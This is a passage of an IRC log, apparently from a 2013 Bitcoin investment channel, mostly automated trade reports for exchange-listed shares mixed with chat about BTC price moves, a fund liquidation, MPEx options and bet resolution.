[TAT.ASICMINER] 17 @ 0.02469 = 0.4197 BTC [+] May 27 17:58:54 Pm me ^^ May 27 17:59:03 [BTCTC] [ESECURITYSABTC] 1 @ 0.3 BTC [+] May 27 17:59:53 https://bitcointalk.org/index.php?topic=123492.msg2285446#msg2285446 can someone confirm my concerns, or am I just being jealous there? May 27 17:59:57 [BTCTC] [ESECURITYSABTC] 2 @ 0.319998 = 0.64 BTC [+] May 27 18:00:40 like the "godaddy secured" < lol May 27 18:01:11 [MPEX] [S.MPOE] 5700 @ 0.00068065 = 3.8797 BTC [+] May 27 18:01:38 jurov busting balls as always May 27 18:01:48 lol May 27 18:01:55 [BTCTC] [BASIC-MINING] 2 @ 0.5997 = 1.1994 BTC [+] May 27 18:02:09 from scratch? May 27 18:02:50 I'd stay away from those guys May 27 18:06:04 [BTCTC] [TAT.ASICMINER] 7 @ 0.02494 = 0.1746 BTC [+] May 27 18:08:20 [MPEX] [S.MPOE] 700 @ 0.00068065 = 0.4765 BTC [+] May 27 18:08:28 [BTCTC] [ASICMINER-PT] 1 @ 2.4555 BTC [+] May 27 18:08:30 [BTCTC] [ASICMINER-PT] 1 @ 2.4551 BTC [-] May 27 18:08:31 [BTCTC] [ASICMINER-PT] 11 @ 2.455 = 27.005 BTC [-] May 27 18:08:34 [BTCTC] [ASICMINER-PT] 2 @ 2.45 = 4.9 BTC [-] May 27 18:08:38 [BTCTC] [ASICMINER-PT] 1 @ 2.4453 BTC [-] May 27 18:08:41 [BTCTC] [ASICMINER-PT] 1 @ 2.445201 BTC [-] May 27 18:08:45 [BTCTC] [ASICMINER-PT] 4 @ 2.4451 = 9.7804 BTC [-] May 27 18:08:48 [BTCTC] [ASICMINER-PT] 2 @ 2.44501 = 4.89 BTC [-] May 27 18:12:04 [HAVELOCK] [ASICM] 15 @ 0.0245101 = 0.3677 BTC [-] May 27 18:12:05 [HAVELOCK] [ASICM] 8 @ 0.02451 = 0.1961 BTC [-] May 27 18:12:06 [HAVELOCK] [ASICM] 5 @ 0.0245 = 0.1225 BTC [-] May 27 18:12:08 [HAVELOCK] [ASICM] 60 @ 0.0245 = 1.47 BTC [-] May 27 18:12:09 [HAVELOCK] [ASICM] 54 @ 0.0245 = 1.323 BTC [-] May 27 18:12:10 [HAVELOCK] [ASICM] 200 @ 0.0244 = 4.88 BTC [-] May 27 18:12:11 [HAVELOCK] [ASICM] 40 @ 0.0244 = 0.976 BTC [-] May 27 18:12:12 [HAVELOCK] [ASICM] 80 @ 0.02430002 = 1.944 BTC [-] May 27 18:12:13 [HAVELOCK] [ASICM] 100 @ 0.02421002 = 2.421 BTC [-] May 27 18:12:14 [HAVELOCK] [ASICM] 2 @ 0.02415001 = 0.0483 BTC [-] May 27 18:12:15 [HAVELOCK] [ASICM] 1000 @ 0.02407 = 24.07 BTC [-] May 27 18:13:29 [BTCTC] [TAT.ASICMINER] 1 @ 0.02494 BTC [+] May 27 18:13:37 [BTCTC] [TAT.ASICMINER] 1 @ 0.02494 BTC [+] May 27 18:13:37 [BTCTC] [TAT.ASICMINER] 1 @ 0.02495 BTC [+] May 27 18:13:39 [BTCTC] [TAT.ASICMINER] 20 @ 0.02495 = 0.499 BTC [+] May 27 18:14:40 [BTCTC] [S.MPOE-PT] 10 @ 0.000748 = 0.0075 BTC [-] May 27 18:14:42 [BTCTC] [S.MPOE-PT] 37 @ 0.000749 = 0.0277 BTC [+] May 27 18:16:19 [BTCTC] [TAT.ASICMINER] 5 @ 0.02469 = 0.1235 BTC [-] May 27 18:16:21 [BTCTC] [TAT.ASICMINER] 2 @ 0.024602 = 0.0492 BTC [-] May 27 18:16:24 [BTCTC] [TAT.ASICMINER] 11 @ 0.024601 = 0.2706 BTC [-] May 27 18:16:27 [BTCTC] [TAT.ASICMINER] 26 @ 0.024511 = 0.6373 BTC [-] May 27 18:16:31 [BTCTC] [TAT.ASICMINER] 6 @ 0.02451 = 0.1471 BTC [-] May 27 18:16:33 [BTCTC] [TAT.ASICMINER] 7 @ 0.0245 = 0.1715 BTC [-] May 27 18:16:35 [BTCTC] [TAT.ASICMINER] 4 @ 0.0245 = 0.098 BTC [-] May 27 18:16:36 [BTCTC] [TAT.ASICMINER] 4 @ 0.0245 = 0.098 BTC [-] May 27 18:16:40 [BTCTC] [TAT.ASICMINER] 20 @ 0.024454 = 0.4891 BTC [-] May 27 18:16:43 [BTCTC] [TAT.ASICMINER] 25 @ 0.024453 = 0.6113 BTC [-] May 27 18:16:48 [BTCTC] [TAT.ASICMINER] 1 @ 0.0244 BTC [-] May 27 18:16:50 [BTCTC] [TAT.ASICMINER] 38 @ 0.024354 = 0.9255 BTC [-] May 27 18:16:52 [BTCTC] [TAT.ASICMINER] 1 @ 0.02435 BTC [-] May 27 18:16:54 [BTCTC] [TAT.ASICMINER] 1 @ 0.0243 BTC [-] May 27 18:16:55 [BTCTC] [TAT.ASICMINER] 1 @ 0.02425 BTC [-] May 27 18:16:57 [BTCTC] [TAT.ASICMINER] 4 @ 0.024204 = 0.0968 BTC [-] May 27 18:16:59 [BTCTC] [TAT.ASICMINER] 43 @ 0.024201 = 1.0406 BTC [-] May 27 18:17:01 [BTCTC] [TAT.ASICMINER] 41 @ 0.024201 = 0.9922 BTC [-] May 27 18:17:03 [BTCTC] [TAT.ASICMINER] 1 @ 0.0242 BTC [-] May 27 18:17:06 [BTCTC] [TAT.ASICMINER] 1 @ 0.0241 BTC [-] May 27 18:17:08 [BTCTC] [TAT.ASICMINER] 12 @ 0.0241 = 0.2892 BTC [-] May 27 18:17:31 [BTCTC] [ASICMINER-PT] 1 @ 2.4451 BTC [+] May 27 18:17:32 [BTCTC] [ASICMINER-PT] 1 @ 2.44501 BTC [-] May 27 18:17:35 [BTCTC] [ASICMINER-PT] 1 @ 2.4435 BTC [-] May 27 18:17:37 [BTCTC] [ASICMINER-PT] 2 @ 2.4271 = 4.8542 BTC [-] May 27 18:17:39 [BTCTC] [ASICMINER-PT] 1 @ 2.426 BTC [-] May 27 18:17:41 [BTCTC] [ASICMINER-PT] 1 @ 2.426 BTC [-] May 27 18:18:27 [BTCTC] [TAT.ASICMINER] 2 @ 0.0241 = 0.0482 BTC [-] May 27 18:18:46 [BTCTC] [TAT.ASICMINER] 6 @ 0.02407 = 0.1444 BTC [-] May 27 18:19:08 [BTCTC] [TAT.ASICMINER] 10 @ 0.024001 = 0.24 BTC [-] May 27 18:19:45 [BTCTC] [TAT.ASICMINER] 14 @ 0.024002 = 0.336 BTC [+] May 27 18:19:48 [BTCTC] [TAT.ASICMINER] 43 @ 0.024 = 1.032 BTC [-] May 27 18:19:51 [BTCTC] [TAT.ASICMINER] 5 @ 0.024 = 0.12 BTC [-] May 27 18:19:53 [BTCTC] [TAT.ASICMINER] 2 @ 0.024 = 0.048 BTC [-] May 27 18:25:48 [MPEX] [S.MPOE] 3300 @ 0.00068035 = 2.2452 BTC [-] May 27 18:30:42 [BTCTC] [TAT.ASICMINER] 1 @ 0.017 BTC [-] May 27 18:32:08 [BTCTC] [ASICMINER-PT] 1 @ 2.474599 BTC [+] May 27 18:32:31 [BTCTC] [ASICMINER-PT] 1 @ 2.474599 BTC [+] May 27 18:36:36 [BTCTC] [TAT.ASICMINER] 9 @ 0.017 = 0.153 BTC [-] May 27 18:37:30 [BTCTC] [ASICMINER-PT] 1 @ 2.4739 BTC [-] May 27 18:38:30 [BTCTC] [TAT.ASICMINER] 2 @ 0.024787 = 0.0496 BTC [+] May 27 18:39:37 [BTCTC] [TAT.ASICMINER] 8 @ 0.024787 = 0.1983 BTC [+] May 27 18:40:39 [BTCTC] [BASIC-MINING] 1 @ 0.5997 BTC [+] May 27 18:49:02 [MPEX] [S.MPOE] 5950 @ 0.00068035 = 4.0481 BTC [-] May 27 18:49:04 [MPEX] [S.MPOE] 8094 @ 0.00068018 = 5.5054 BTC [-] May 27 18:50:07 [BTCTC] [CRYPTO-TRADE] 1 @ 0.190002 BTC [-] May 27 18:50:41 [BTCTC] [PAJKA.BOND] 1 @ 0.109989 BTC [+] May 27 18:52:04 [HAVELOCK] [ASICM] 10 @ 0.0245 = 0.245 BTC [+] May 27 18:57:30 [BTCTC] [CRYPTO-TRADE] 5 @ 0.199 = 0.995 BTC [+] May 27 18:57:32 [BTCTC] [CRYPTO-TRADE] 5 @ 0.1999 = 0.9995 BTC [+] May 27 19:09:05 [HAVELOCK] [ASICM] 3 @ 0.024649 = 0.0739 BTC [+] May 27 19:09:05 [HAVELOCK] [ASICM] 1 @ 0.024649 BTC [+] May 27 19:14:04 [HAVELOCK] [ASICM] 20 @ 0.0246 = 0.492 BTC [-] May 27 19:19:04 [HAVELOCK] [HIM] 1 @ 2.7 BTC [+] May 27 19:20:04 [HAVELOCK] [ASICM] 4 @ 0.02425 = 0.097 BTC [-] May 27 19:23:55 Want to sell 48 ASICMINER shares :) pm me with offer May 27 19:25:42 why would you sell they are doing stellar May 27 19:26:04 [HAVELOCK] [ASICM] 115 @ 0.0241 = 2.7715 BTC [-] May 27 19:26:46 I am liquidating Gamma Bitcoin Funds position to give back the Bitcoins to the original investors :) May 27 19:28:28 Roughly 8500 BTC will be returned in this payment, the fund was valued at 7220 BTC when the closing began. With this payment over 10 000 BTC will have been returned :) Considering the whole GLBSE crash that's pretty good May 27 19:28:34 when would you have him sell, when they do shitty ? May 27 19:28:53 Sell on top I guess ^^ May 27 19:31:24 [MPEX] [S.MPOE] 13750 @ 0.00068053 = 9.3573 BTC [+] May 27 19:32:51 [BTCTC] [ASICMINER-PT] 1 @ 2.46889 BTC [-] May 27 19:33:04 [HAVELOCK] [ASICM] 60 @ 0.024249 = 1.4549 BTC [+] May 27 19:33:41 [BTCTC] [TAT.ASICMINER] 20 @ 0.024749 = 0.495 BTC [-] May 27 19:36:04 [HAVELOCK] [ASICM] 4 @ 0.024688 = 0.0988 BTC [+] May 27 19:37:04 [HAVELOCK] [ASICM] 31 @ 0.024688 = 0.7653 BTC [+] May 27 19:39:05 [HAVELOCK] [ASICM] 165 @ 0.024688 = 4.0735 BTC [+] May 27 19:45:51 [BTCTC] [BASIC-MINING] 1 @ 0.5997 BTC [+] May 27 19:46:53 [BTCTC] [BTC-BOND] 7 @ 0.0105 = 0.0735 BTC [+] May 27 19:52:25 [MPEX] [S.MPOE] 4321 @ 0.00068101 = 2.9426 BTC [+] May 27 19:52:26 [MPEX] [S.MPOE] 16479 @ 0.00068097 = 11.2217 BTC [-] May 27 20:03:14 anyone got a guess as to where GIGAMINING shares would trade today, if we were allowed to trade them? May 27 20:03:35 [BTCTC] [BITVPS] 807 @ 0.0008 = 0.6456 BTC [-] May 27 20:03:35 [BTCTC] [BITVPS] 1 @ 0.00075 BTC [-] May 27 20:03:37 [BTCTC] [BITVPS] 20 @ 0.000701 = 0.014 BTC [-] May 27 20:03:39 [BTCTC] [BITVPS] 1000 @ 0.000701 = 0.701 BTC [-] May 27 20:03:41 [BTCTC] [BITVPS] 109 @ 0.0007 = 0.0763 BTC [-] May 27 20:03:42 [BTCTC] [BITVPS] 113 @ 0.0007 = 0.0791 BTC [-] May 27 20:03:43 [BTCTC] [BITVPS] 25 @ 0.000681 = 0.017 BTC [-] May 27 20:03:45 [BTCTC] [BITVPS] 185 @ 0.00062 = 0.1147 BTC [-] May 27 20:03:46 [BTCTC] [BITVPS] 1000 @ 0.00061 = 0.61 BTC [-] May 27 20:03:47 [BTCTC] [BITVPS] 1000 @ 0.000601 = 0.601 BTC [-] May 27 20:03:49 [BTCTC] [BITVPS] 9 @ 0.0006 = 0.0054 BTC [-] May 27 20:03:50 [BTCTC] [BITVPS] 2500 @ 0.000581 = 1.4525 BTC [-] May 27 20:04:39 [BTCTC] [BTC-BOND] 1 @ 0.0105 BTC [+] May 27 20:05:34 [BTCTC] [PAJKA.BOND] 5 @ 0.109989 = 0.5499 BTC [+] May 27 20:06:14 [BTCTC] [ASICMINER-PT] 1 @ 2.46889 BTC [-] May 27 20:06:16 [BTCTC] [ASICMINER-PT] 1 @ 2.4689 BTC [+] May 27 20:06:18 [BTCTC] [ASICMINER-PT] 2 @ 2.47099 = 4.942 BTC [+] May 27 20:06:23 [BTCTC] [ASICMINER-PT] 1 @ 2.4738 BTC [+] May 27 20:06:28 [BTCTC] [ASICMINER-PT] 1 @ 2.4739 BTC [+] May 27 20:06:30 [BTCTC] [ASICMINER-PT] 1 @ 2.474599 BTC [+] May 27 20:06:32 [BTCTC] [ASICMINER-PT] 5 @ 2.47478 = 12.3739 BTC [+] May 27 20:06:34 [BTCTC] [ASICMINER-PT] 8 @ 2.475 = 19.8 BTC [+] May 27 20:06:35 gogogo May 27 20:06:51 [BTCTC] [PAJKA.BOND] 40 @ 0.109989 = 4.3996 BTC [+] May 27 20:07:40 OTC auctions for AM drying up, div speculation day is tomorrow, DT about to pay off his investors. Looking good May 27 20:08:53 [BTCTC] [TAT.ASICMINER] 8 @ 0.024749 = 0.198 BTC [-] May 27 20:08:53 [BTCTC] [TAT.ASICMINER] 9 @ 0.02475 = 0.2228 BTC [+] May 27 20:10:23 possibly May 27 20:10:31 :) May 27 20:10:40 we still have the Jutarul auction hanging over us May 27 20:10:47 1700 @ 2.5 left May 27 20:11:51 [BTCTC] [COGNITIVE] 1 @ 0.2911 BTC [-] May 27 20:11:53 [BTCTC] [COGNITIVE] 1 @ 0.291 BTC [-] May 27 20:12:02 [BTCTC] [S.DICE-PT] 3 @ 0.00325 = 0.0098 BTC [+] May 27 20:12:04 [HAVELOCK] [ASICM] 75 @ 0.02469 = 1.8518 BTC [+] May 27 20:13:05 [HAVELOCK] [ASICM] 325 @ 0.02469 = 8.0243 BTC [+] May 27 20:13:26 [BTCTC] [S.DICE-PT] 12 @ 0.002752 = 0.033 BTC [-] May 27 20:14:12 [BTCTC] [GSDPT] 92 @ 0.00272 = 0.2502 BTC [-] May 27 20:14:14 [BTCTC] [GSDPT] 8 @ 0.002724 = 0.0218 BTC [+] May 27 20:15:05 [HAVELOCK] [ASICM] 200 @ 0.02469 = 4.938 BTC [+] May 27 20:18:17 [BTCTC] [ASICMINER-PT] 6 @ 2.45901 = 14.7541 BTC [-] May 27 20:33:43 someone interested in 100 BTC for 0.99*{gox bid} ? May 27 20:39:01 [BTCTC] [CRYPTO-TRADE] 1 @ 0.19989 BTC [-] May 27 20:39:05 [BTCTC] [CRYPTO-TRADE] 5 @ 0.1999 = 0.9995 BTC [+] May 27 20:39:07 [BTCTC] [CRYPTO-TRADE] 6 @ 0.19995 = 1.1997 BTC [+] May 27 20:39:09 [BTCTC] [CRYPTO-TRADE] 1 @ 0.199997 BTC [+] May 27 20:39:11 [BTCTC] [CRYPTO-TRADE] 150 @ 0.199999 = 29.9999 BTC [+] May 27 20:39:12 [BTCTC] [CRYPTO-TRADE] 150 @ 0.199999 = 29.9999 BTC [+] May 27 20:43:42 [MPEX] [S.MPOE] 5200 @ 0.0006832 = 3.5526 BTC [+] May 27 20:43:42 [MPEX] [S.MPOE] 4321 @ 0.00068414 = 2.9562 BTC [+] May 27 20:43:53 [MPEX] [S.MPOE] 2123 @ 0.00068415 = 1.4525 BTC [+] May 27 20:43:56 [MPEX] [S.MPOE] 4140 @ 0.00068434 = 2.8332 BTC [+] May 27 20:47:01 [BTCTC] [BASIC-MINING] 1 @ 0.560001 BTC [-] May 27 20:47:05 [BTCTC] [BASIC-MINING] 1 @ 0.56 BTC [-] May 27 20:50:13 [BTCTC] [BITVPS] 6 @ 0.000571 = 0.0034 BTC [-] May 27 20:54:00 [BTCTC] [BTC-BOND] 1 @ 0.01012 BTC [-] May 27 21:07:22 [BTCTC] [TAT.ASICMINER] 76 @ 0.02472 = 1.8787 BTC [-] May 27 21:08:05 [HAVELOCK] [ASICM] 1 @ 0.024794 BTC [+] May 27 21:12:09 [BTCTC] [TAT.ASICMINER] 2 @ 0.02472 = 0.0494 BTC [-] May 27 21:13:43 hrm May 27 21:14:03 aboot hao long does a manual wirhdrawal take from btctc? May 27 21:14:10 never had enough btc to where it was an issue before May 27 21:14:11 :3 May 27 21:14:35 depends May 27 21:14:40 1-30 hours May 27 21:14:53 it's slowest on weekends May 27 21:19:19 [BTCTC] [TAT.ASICMINER] 2 @ 0.02422 = 0.0484 BTC [-] May 27 21:19:21 [BTCTC] [TAT.ASICMINER] 6 @ 0.02421 = 0.1453 BTC [-] May 27 21:19:24 [BTCTC] [TAT.ASICMINER] 1 @ 0.024209 BTC [-] May 27 21:19:25 [BTCTC] [TAT.ASICMINER] 12 @ 0.024208 = 0.2905 BTC [-] May 27 21:19:28 [BTCTC] [TAT.ASICMINER] 3 @ 0.02473 = 0.0742 BTC [+] May 27 21:19:54 [BTCTC] [ASICMINER-PT] 1 @ 2.47499 BTC [+] May 27 21:30:52 someone interested in 100 BTC for 0.99*{gox bid} ? May 27 21:31:37 [BTCTC] [TAT.ASICMINER] 2 @ 0.02472 = 0.0494 BTC [-] May 27 21:31:38 [BTCTC] [TAT.ASICMINER] 1 @ 0.02473 BTC [+] May 27 21:31:45 b0n1: only if we can use my gox bid for $1 May 27 21:32:30 sure inhies May 27 21:32:53 give me your address, i will just give them to you as a present May 27 21:33:22 [BTCTC] [ASICMINER-PT] 1 @ 2.47499 BTC [+] May 27 21:36:58 [BTCTC] [TAT.ASICMINER] 12 @ 0.02472 = 0.2966 BTC [-] May 27 21:37:42 [BTCTC] [TAT.ASICMINER] 22 @ 0.02473 = 0.5441 BTC [+] May 27 21:38:42 No, it's 100 BTC May 27 21:38:55 Ask the whole of it May 27 21:39:15 [BTCTC] [TAT.ASICMINER] 24 @ 0.02473 = 0.5935 BTC [+] May 27 21:39:43 greedy* May 27 21:40:13 i'll send you a basket of apples for 10 btc May 27 21:40:19 :) May 27 21:40:40 [BTCTC] [COGNITIVE] 2 @ 0.2755 = 0.551 BTC [-] May 27 21:41:08 [BTCTC] [TAT.ASICMINER] 16 @ 0.02473 = 0.3957 BTC [+] May 27 21:41:19 gaiz May 27 21:41:24 b0n1 already said theyre mine May 27 21:41:26 fuck off May 27 21:41:30 can anyone identify the first ingredient in this gigantic omelet? May 27 21:41:34 http://www.youtube.com/watch?v=mxPCGzCx5LY May 27 21:43:27 truffles: i refere you to the 'sure inhies' line May 27 21:43:55 are you sure it's not some asian shallot? May 27 21:43:55 wtf.... May 27 21:44:01 what a huge drop May 27 21:44:08 ;;ticker --last May 27 21:44:08 130.50100 May 27 21:44:08 in price right now May 27 21:49:10 [BTCTC] [ASICMINER-PT] 3 @ 2.474999 = 7.425 BTC [+] May 27 21:50:49 [MPEX] [S.MPOE] 7228 @ 0.00068097 = 4.9221 BTC [-] May 27 21:51:07 [BTCTC] [ASICMINER-PT] 1 @ 2.4615 BTC [-] May 27 21:51:10 [BTCTC] [ASICMINER-PT] 6 @ 2.46 = 14.76 BTC [-] May 27 21:51:14 [BTCTC] [ASICMINER-PT] 6 @ 2.45901 = 14.7541 BTC [-] May 27 21:51:17 [BTCTC] [ASICMINER-PT] 1 @ 2.459 BTC [-] May 27 22:00:44 can someone give me the linke with the historic mtgox lag? May 27 22:04:42 nm got it May 27 22:07:27 [MPEX] [S.MPOE] 1310 @ 0.00068434 = 0.8965 BTC [+] May 27 22:07:29 [MPEX] [S.MPOE] 4321 @ 0.00068477 = 2.9589 BTC [+] May 27 22:07:39 [MPEX] [S.MPOE] 6869 @ 0.00068478 = 4.7038 BTC [+] May 27 22:11:06 [HAVELOCK] [VTX] 1 @ 0.43 BTC [+] May 27 22:11:55 does someone know the owners of this site ? https://bitcoinnordic.com/contact/ May 27 22:16:03 nope May 27 22:17:25 [BTCTC] [TAT.ASICMINER] 1 @ 0.02473 BTC [+] May 27 22:19:57 [BTCTC] [CRYPTO-TRADE] 10 @ 0.2 = 2 BTC [+] May 27 22:28:06 [HAVELOCK] [ASICM] 4 @ 0.024794 = 0.0992 BTC [+] May 27 22:29:05 [MPEX] [S.MPOE] 20000 @ 0.00068478 = 13.6956 BTC [+] May 27 22:33:05 [BTCTC] [TAT.ASICMINER] 1 @ 0.02472 BTC [-] May 27 22:34:05 [HAVELOCK] [ASICM] 16 @ 0.024794 = 0.3967 BTC [+] May 27 22:40:03 [MPEX] [S.MPOE] 10750 @ 0.00068478 = 7.3614 BTC [+] May 27 22:43:54 [BTCTC] [TAT.ASICMINER] 1 @ 0.0245 BTC [-] May 27 22:43:56 [BTCTC] [TAT.ASICMINER] 1 @ 0.0244 BTC [-] May 27 22:43:58 [BTCTC] [TAT.ASICMINER] 2 @ 0.0244 = 0.0488 BTC [-] May 27 23:09:11 [BTCTC] [BITVPS] 3 @ 0.000779 = 0.0023 BTC [+] May 27 23:10:11 [BTCTC] [ASICMINER-PT] 1 @ 2.439 BTC [-] May 27 23:15:32 [BTCTC] [S.MPOE-PT] 10 @ 0.000749 = 0.0075 BTC [+] May 27 23:16:01 [BTCTC] [TAT.ASICMINER] 9 @ 0.024399 = 0.2196 BTC [-] May 27 23:18:05 [BTCTC] [S.DICE-PT] 12 @ 0.003247 = 0.039 BTC [+] May 27 23:18:47 [BTCTC] [ASICMINER-PT] 1 @ 2.434 BTC [-] May 27 23:18:48 [BTCTC] [ASICMINER-PT] 1 @ 2.4335 BTC [-] May 27 23:18:51 [BTCTC] [ASICMINER-PT] 1 @ 2.4322 BTC [-] May 27 23:18:54 [BTCTC] [ASICMINER-PT] 2 @ 2.43211 = 4.8642 BTC [-] May 27 23:18:56 [BTCTC] [ASICMINER-PT] 1 @ 2.432002 BTC [-] May 27 23:18:58 [BTCTC] [ASICMINER-PT] 1 @ 2.4306 BTC [-] May 27 23:19:03 [BTCTC] [ASICMINER-PT] 3 @ 2.430502 = 7.2915 BTC [-] May 27 23:19:08 [BTCTC] [ASICMINER-PT] 1 @ 2.4305 BTC [-] May 27 23:22:30 [BTCTC] [S.DICE-PT] 4 @ 0.003248 = 0.013 BTC [+] May 27 23:24:05 [BTCTC] [S.DICE-PT] 3 @ 0.003248 = 0.0097 BTC [+] May 27 23:25:07 [HAVELOCK] [ASICM] 42 @ 0.024795 = 1.0414 BTC [+] May 27 23:27:44 [BTCTC] [ASICMINER-PT] 1 @ 2.46 BTC [+] May 27 23:30:30 [BTCTC] [S.DICE-PT] 5 @ 0.003248 = 0.0162 BTC [+] May 27 23:31:07 [HAVELOCK] [ASICM] 2 @ 0.024795 = 0.0496 BTC [+] May 27 23:40:27 [BTCTC] [S.DICE-PT] 1 @ 0.0047 BTC [+] May 27 23:41:06 [HAVELOCK] [ASICM] 2 @ 0.024795 = 0.0496 BTC [+] May 27 23:41:59 [MPEX] [S.MPOE] 6550 @ 0.00068218 = 4.4683 BTC [-] May 27 23:42:01 [MPEX] [S.MPOE] 2550 @ 0.00068164 = 1.7382 BTC [-] May 27 23:43:06 [HAVELOCK] [ASICM] 9 @ 0.02461 = 0.2215 BTC [-] May 27 23:43:06 [HAVELOCK] [ASICM] 2 @ 0.0246 = 0.0492 BTC [-] May 27 23:44:06 [HAVELOCK] [ASICM] 9 @ 0.0246 = 0.2214 BTC [-] May 27 23:44:53 [BTCTC] [S.DICE-PT] 30 @ 0.00325 = 0.0975 BTC [-] May 27 23:46:39 [BTCTC] [PAJKA.BOND] 20 @ 0.109 = 2.18 BTC [-] May 27 23:47:23 [BTCTC] [BASIC-MINING] 1 @ 0.599899 BTC [+] May 27 23:47:25 [BTCTC] [BASIC-MINING] 2 @ 0.5999 = 1.1998 BTC [+] May 27 23:50:29 [BTCTC] [ASICMINER-PT] 1 @ 2.43191 BTC [-] May 27 23:50:32 [BTCTC] [ASICMINER-PT] 1 @ 2.4315 BTC [-] May 27 23:57:30 ;;ticker May 27 23:57:30 BTCUSD ticker | Best bid: 128.14103, Best ask: 128.40000, Bid-ask spread: 0.25897, Last trade: 128.15105, 24 hour volume: 44894.54457244, 24 hour low: 124.00000, 24 hour high: 135.48799, 24 hour vwap: 129.55545 May 27 23:57:48 lol the banks close for 3 days and the price pops May 27 23:57:49 lol May 27 23:59:42 oh, there's free day in US? May 28 00:00:04 [BTCTC] [TAT.ASICMINER] 1 @ 0.024727 BTC [+] May 28 00:01:42 ;;calc 45.07/1.60 May 28 00:01:42 28.16875 May 28 00:02:08 ;;calc 45.07 * .75 May 28 00:02:09 33.8025 May 28 00:02:11 [BTCTC] [BITVPS] 25 @ 0.0007 = 0.0175 BTC [-] May 28 00:02:13 [BTCTC] [BITVPS] 68 @ 0.000652 = 0.0443 BTC [-] May 28 00:04:28 [BTCTC] [TAT.ASICMINER] 1 @ 0.024727 BTC [+] May 28 00:05:03 [BTCTC] [TAT.ASICMINER] 1 @ 0.024727 BTC [+] May 28 00:11:25 [BTCTC] [MININGCO.ETF] 3 @ 0.749 = 2.247 BTC [+] May 28 00:16:23 [BTCTC] [TAT.ASICMINER] 1 @ 0.02431 BTC [-] May 28 00:19:08 [BTCTC] [TAT.ASICMINER] 9 @ 0.02431 = 0.2188 BTC [-] May 28 00:22:58 [BTCTC] [RSM] 1 @ 0.0107 BTC [-] May 28 00:25:05 [BTCTC] [RSM] 1 @ 0.0106 BTC [-] May 28 00:25:10 [BTCTC] [RSM] 1 @ 0.0106 BTC [-] May 28 00:25:39 [BTCTC] [RSM] 58 @ 0.0105 = 0.609 BTC [-] May 28 00:26:48 [HAVELOCK] [HIM] 1 @ 2.6201 BTC [-] May 28 00:30:33 [BTCTC] [ASICMINER-PT] 1 @ 2.449 BTC [+] May 28 00:33:06 [HAVELOCK] [ASICM] 26 @ 0.02459501 = 0.6395 BTC [-] May 28 00:33:07 [HAVELOCK] [ASICM] 55 @ 0.024595 = 1.3527 BTC [-] May 28 00:35:06 [HAVELOCK] [ASICM] 148 @ 0.024595 = 3.6401 BTC [-] May 28 00:37:38 Ah, c'mon, I pop out for a few days and you guys crash the BTC price? I can't leave you people alone without supervision for a minute, can I? *tsk* May 28 00:38:01 Well, I'm moving to Costa Rica. I really can't have this anymore. You're on your own for a few days. Bye. May 28 00:38:18 send greets to evoorhees May 28 00:38:32 oh hes in panama May 28 00:38:34 I'll send you his kneecaps when I find him :-P May 28 00:38:55 lmao May 28 00:39:02 Nah, I'm sure he's a nice guy, I just clocked my first albeit minor loss on SDICE a few days ago. May 28 00:39:23 Any particular reason for thew price drop or just general volatility? May 28 00:39:33 dump May 28 00:39:44 plus some dude sold 7k btc at 125 May 28 00:39:53 twas quite a wild ride May 28 00:39:54 Ouch. May 28 00:40:12 ;;ticker May 28 00:40:12 BTCUSD ticker | Best bid: 129.50001, Best ask: 129.59000, Bid-ask spread: 0.08999, Last trade: 129.59000, 24 hour volume: 46436.53720631, 24 hour low: 124.00000, 24 hour high: 135.48799, 24 hour vwap: 129.53265 May 28 00:40:19 that counts as a crash now ? May 28 00:40:23 how quickly we forget. May 28 00:40:35 [BTCTC] [BITVPS] 1 @ 0.000779 BTC [+] May 28 00:40:45 $9 in a day usually is :-) May 28 00:41:10 OK, I'm logging off, take care. See you in a different time zone. May 28 00:42:33 mircea_popescu: i hope your bot made good use of this opportunity May 28 00:42:56 um. May 28 00:43:06 $avg May 28 00:43:07 jurov: 129.15 May 28 00:43:11 how's a few dollars times a few bitcoins an opportunity, and why do you think i trade for fiat ?! May 28 00:43:54 dunno, you bot your own exchange? May 28 00:43:58 [MPEX] [S.MPOE] 3986 @ 0.00068478 = 2.7295 BTC [+] May 28 00:45:40 fiat500: you mean mpoe? have a clue how it works? May 28 00:46:04 [MPEX] [S.MPOE] 5000 @ 0.00068638 = 3.4319 BTC [+] May 28 00:46:11 ;;bids 0 May 28 00:46:17 There are currently 13530390 bitcoins demanded at or over 0.0 USD, worth 16953927.4395 USD in total. | Data vintage: 0.0586 seconds May 28 00:46:19 not particularly, i saw march and april reports on his blog and assumed it was some silly bot that was trading btcusd May 28 00:46:36 lol May 28 00:47:23 (what is it) May 28 00:47:33 "some silly bot that was trading btcusd" use that to tease mpoe-pr sometime May 28 00:47:55 the bot is marketmaking all these O.USD. options on MPEx May 28 00:48:11 the writing style makes me very suspicious that mpoe-pr is really just mircea_popescu May 28 00:48:20 still ? May 28 00:48:26 lol May 28 00:48:34 still what May 28 00:49:06 " mpoe-pr is really just mircea_popescu" stuff. May 28 00:49:10 that meme refuses to die May 28 00:49:40 mircea_popescu: ive been around for like.. 2 weeks May 28 00:49:48 it's not a bad meme. May 28 00:50:02 reading through the forum it never once crossed my mind that mpoe-pr was anyone other than you :P May 28 00:50:14 how many straight guys constantly pass for juggy chicks May 28 00:50:26 unless mpoe-pr is also writing your english blogposts on trilema May 28 00:50:26 [BTCTC] [CRYPTO-TRADE] 3 @ 0.2 = 0.6 BTC [+] May 28 00:51:23 i'm not native speaker and i can clearly distinguish the writng style May 28 00:51:45 -pr does not use footnotes, for example May 28 00:51:46 jurov you have the distinct advantage of having met her. May 28 00:52:00 is he the one with or without the beard? May 28 00:52:03 yes but i saw that before May 28 00:52:07 a ok May 28 00:52:13 LOL May 28 00:52:51 ok so what are these O.USD options on mpex May 28 00:53:27 maybe you can read the description and then ask May 28 00:53:38 http://mpex.co/?mpsic=O.USD.C020T May 28 00:54:00 oh i forgot there is none :) May 28 00:54:22 lol darned mpsic change May 28 00:54:33 hey mircea_popescu quick question about BBET May 28 00:54:37 thestringpuller shoot May 28 00:54:47 fiat500 there are some threads: https://www.bitcoinforum.com/coinbr-com/ May 28 00:54:52 fiat500 they're options, struck at the respective value. May 28 00:55:07 [HAVELOCK] [HIM] 1 @ 2.7 BTC [+] May 28 00:55:45 so I recall we had a discussion about "local bets" where if someone put money up on a bet that was something that only local people would know for instance "Lucy gets pregnant before graduating" etc. you would be okay with it May 28 00:55:52 however how would the be be resolved? May 28 00:55:58 given it's "local knowledge" May 28 00:56:36 well let's distinguish between bets of local interest and bets that can't be resolved. May 28 00:56:43 the latter aren't acceptable. the former are. May 28 00:57:22 bets of local 